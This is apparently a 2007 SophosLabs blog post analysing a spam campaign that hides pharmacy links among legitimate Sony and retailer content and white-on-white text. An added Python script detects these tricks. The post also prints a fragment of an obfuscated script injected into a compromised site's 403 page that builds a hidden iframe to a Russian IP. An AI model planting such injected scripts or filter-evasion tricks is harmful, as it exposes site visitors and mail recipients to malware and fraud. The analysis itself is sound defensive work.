Automated or manual spam “infection”?
One of the common detection evasion techniques used by spammers is the inclusion of legitimate URLs in spam emails. The intention is to lower the overall message spam score and to break the message checksumming algorithm. The technique is often combined with paragraphs of text taken from legitimate sources, such as books available through Project Gutenberg.
A few days ago, while I was doing my regular spam analysis round, I came across several messages that initially looked like ordinary spam. Visible text after the images linking to spam web pages drew my attention to the rest of the message. The text looked as if it had been taken from a legitimate source, most probably from Sony’s marketing collateral:
LEGAL
CEA is not responsible for technical, hardware or software failures, any lost or unavailable network connections, failed, incomplete, garbled or delayed computer transmissions, misspelled email addresses, lost or deleted email transmissions due to the settings in your email application. Any of these factors may limit one’s ability to successfully participate in this activity. Uncharted: Drake’s Fortune is a trademark of Sony Computer Entertainment America Inc. Created and developed by Naughty Dog, Inc. © 2007 Sony Computer Entertainment America Inc.
“PlayStation”, “PLAYSTATION”, and the “PS” Family logo are registered trademarks of Sony Computer Entertainment Inc. Underground is a trademark of Sony Computer Entertainment America Inc. 2007 Sony Computer Entertainment America Inc. The Sony Computer Entertainment logo is a registered trademark of Sony Corporation.
Sony Computer Entertainment America Inc., 919 E. Hillsdale Blvd., Foster City, CA 94404
A quick look at the message source reveals the rest of the message, which seems to be a legitimate advertisement for the game Uncharted: Drake’s Fortune, with the twist of white text on a white background (common for Bayesian poisoning).
What really makes this message spam is a paragraph inserted in the middle of the message. The paragraph contains three URLs pointing to web pages that redirect the browser to domains serving the notorious “Canadian Pharmacy” website.
Another interesting characteristic is the use of legitimate images for linking to spam sites. A legitimate image used in this campaign comes from Barnes and Noble and was possibly used in Barnes and Noble’s holiday season mailing list:
I wonder whether the combination of legitimate images with spam URLs was part of an attempt to confuse anti-spam software?
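As an added example, not part of the original post, the following Python script checks an HTML mail body for the two tricks described above: images served from one host but wrapped in a link to another, and text coloured white so that it vanishes on the message's white background. The host names and the sample body are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

WHITE = re.compile(r"^\s*(#f{3}|#f{6}|white)\s*$", re.I)

def _is_white(attrs):
    """True if the element sets a white foreground via color= or style=."""
    if WHITE.match(attrs.get("color", "")):
        return True
    m = re.search(r"(?<![-\w])color\s*:\s*([^;]+)", attrs.get("style", ""))
    return bool(m and WHITE.match(m.group(1)))

class MailAuditor(HTMLParser):
    """Flags images linked to a different host and white (invisible) text."""
    def __init__(self):
        super().__init__()
        self.stack = []        # open elements: (tag, link host or None, hidden?)
        self.mismatched = []   # (image host, link host) pairs
        self.hidden_text = []  # text runs rendered white-on-white
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "img":       # void element: inspect it, do not push it
            link = next((h for _, h, _ in reversed(self.stack) if h), None)
            img = urlsplit(a.get("src", "")).hostname
            if link and img and img != link:
                self.mismatched.append((img, link))
            return
        link = urlsplit(a.get("href", "")).hostname if tag == "a" else None
        self.stack.append((tag, link, _is_white(a)))
    def handle_endtag(self, tag):   # tolerate sloppy nesting / stray end tags
        if tag in [t for t, _, _ in self.stack]:
            while self.stack.pop()[0] != tag: pass
    def handle_data(self, data):
        if data.strip() and any(h for _, _, h in self.stack):
            self.hidden_text.append(data.strip())

def audit(html):
    p = MailAuditor(); p.feed(html); p.close()
    return {"image_link_mismatch": p.mismatched, "hidden_text": p.hidden_text}

# Constructed sample (hosts are placeholders): a retailer-style image wrapped in a
# link to a redirector page, plus white legal boilerplate used as filler text.
SAMPLE = """<html><body bgcolor="#ffffff"><a href="http://redirector.example/store.htm">
<img src="http://images.retailer.example/holiday.gif"></a><table><tr><td>
<font color="#FFFFFF">CEA is not responsible for technical, hardware or software failures ...</font>
<p style="color: white; background-color: #fff">Underground is a trademark ...</p>
<a href="http://images.retailer.example/promo.htm"><img src="http://images.retailer.example/promo.gif"></a>
</td></tr></table></body></html>"""
```

Running `audit(SAMPLE)` reports the one image/link host mismatch and the two white text runs, while the retailer's own image linked to its own host is not flagged.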
The next step is to investigate the sites linked from the message. All three spam URLs point to a page named store.htm. After investigating the domains, it looks like the sites were not specifically set up for spamming, but were neglected and eventually compromised to redirect to “Canadian Pharmacy”. A request for the root directory of one of the websites returns a 403 Access Forbidden page which looks like a default 403, but contains a suspicious script in the <body> tag of the document:
// Fragment of the injected script: the string pieces are later concatenated into an <iframe> tag
status="";zz='2';sl='/';sf='ram';pi='9';po='.';qu=':';yh='4';tr='c.p';
vo='3';bw='5';pt='tp';ab='src';dg='ht';ko='e';wd='if';ji='hp';hh='1';
The script variables are used to construct an <iframe> pointing to an IP address hosted in Russia. A visit to the IP address reveals that the owner is not interested in seeing us. Maybe we are not coming from the right location/country, or we are using the wrong browser, or he is indeed fast asleep?
From the layout of the message source you could almost conclude that the message was “infected” with spam in an automated way. On the other hand, some logic was required to place the spam paragraph in the middle of an HTML table, which makes me think this is a one-off test of effectiveness created by manual modification. A more sophisticated approach to this technique may make spam analysis more complex in the future.
Posted on November 22nd, 2007 by Vanja Svajcer, SophosLabs, UK. Filed under: General, Malware, Spam